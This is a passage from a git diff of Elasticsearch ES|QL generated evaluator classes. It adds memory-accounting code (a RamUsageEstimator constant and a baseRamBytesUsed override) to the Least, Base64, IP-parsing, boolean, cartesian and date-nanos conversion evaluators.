a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastDoubleEvaluator.java index 2c9c45e363d63..e3720f2dc78ff 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastDoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LeastDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock[] valuesBlocks) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { double[] valuesValues = new double[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastIntEvaluator.java index e14d83dafb951..80dd2a413d526 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LeastIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock[] valuesBlocks) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { int[] valuesValues = new int[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastLongEvaluator.java index da2e98b59220f..9cf56741191d4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LeastLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock[] valuesBlocks) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { long[] valuesValues = new long[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromBase64Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromBase64Evaluator.java index c4a22cc06900d..160b651ac10c8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromBase64Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/FromBase64Evaluator.java @@ -10,6 +10,7 @@ import java.util.function.Function; import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.BytesRefBuilder; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class FromBase64Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(FromBase64Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock fieldBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef fieldScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreDecimalEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreDecimalEvaluator.java index b4f732dab404f..7aa3503a7df56 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreDecimalEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreDecimalEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ParseIpLeadingZerosAreDecimalEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ParseIpLeadingZerosAreDecimalEvaluator.class); + private final EvalOperator.ExpressionEvaluator string; private final BreakingBytesRefBuilder scratch; @@ -122,6 +125,13 @@ public void close() { Releasables.closeExpectNoException(string, scratch); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += string.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreOctalEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreOctalEvaluator.java index 009cdfa0a202e..177b0129553ab 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreOctalEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosAreOctalEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ParseIpLeadingZerosAreOctalEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ParseIpLeadingZerosAreOctalEvaluator.class); + private final EvalOperator.ExpressionEvaluator string; private final BreakingBytesRefBuilder scratch; @@ -122,6 +125,13 @@ public void close() { Releasables.closeExpectNoException(string, scratch); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += string.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosRejectedEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosRejectedEvaluator.java index f826ec26e8e99..623b917820d21 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosRejectedEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ParseIpLeadingZerosRejectedEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ParseIpLeadingZerosRejectedEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ParseIpLeadingZerosRejectedEvaluator.class); + private final EvalOperator.ExpressionEvaluator string; private final BreakingBytesRefBuilder scratch; @@ -122,6 +125,13 @@ public void close() { Releasables.closeExpectNoException(string, scratch); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += string.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBase64Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBase64Evaluator.java index 3fafd237030db..1f9f17cb44cdd 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBase64Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBase64Evaluator.java @@ -11,6 +11,7 @@ import java.util.function.Function; import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.BytesRefBuilder; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ToBase64Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBase64Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -55,6 +58,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock fieldBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef fieldScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromDoubleEvaluator.java index 3c92fe5fbe21a..96e380d6b3379 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToBooleanFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromDoubleEvaluator.class); + private final EvalOperator.ExpressionEvaluator d; public ToBooleanFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator d, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(d); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromIntEvaluator.java index 6629645b8c807..11071c3d31539 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.IntBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToBooleanFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromIntEvaluator.class); + private final EvalOperator.ExpressionEvaluator i; public ToBooleanFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator i, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(i); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += i.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromLongEvaluator.java index 62cd71b7684f8..0157e250756bc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToBooleanFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator l; public ToBooleanFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator l, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(l); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += l.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromStringEvaluator.java index 9e7fb934b29eb..2efbec8a1e43c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToBooleanFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator keyword; public ToBooleanFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator keyword, @@ -102,6 +105,13 @@ public void close() { Releasables.closeExpectNoException(keyword); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += keyword.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromUnsignedLongEvaluator.java index f26e375b269f3..5aeaf87635e18 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToBooleanFromUnsignedLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToBooleanFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToBooleanFromUnsignedLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator ul; public ToBooleanFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator ul, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(ul); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += ul.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianPointFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianPointFromStringEvaluator.java index 72de57bbbbd77..5804eaf792c97 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianPointFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianPointFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToCartesianPointFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToCartesianPointFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToCartesianPointFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -116,6 +119,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianShapeFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianShapeFromStringEvaluator.java index b1080b0639df7..13ac62ab3cac8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianShapeFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToCartesianShapeFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToCartesianShapeFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToCartesianShapeFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToCartesianShapeFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -116,6 +119,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDatetimeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDatetimeEvaluator.java index 83f9226f61b9e..aba3bf7e4bcd9 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDatetimeEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDatetimeEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDateNanosFromDatetimeEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDateNanosFromDatetimeEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDateNanosFromDatetimeEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDoubleEvaluator.java index 6bc6f4ab1b2d0..defd4c0bb0ddc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDateNanosFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDateNanosFromDoubleEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDateNanosFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -115,6 +118,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromLongEvaluator.java index ee0c9f39b6d7e..002e141bb3331 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDateNanosFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDateNanosFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDateNanosFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromStringEvaluator.java index 040a17efbfee8..d72071c50dcae 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromStringEvaluator.java 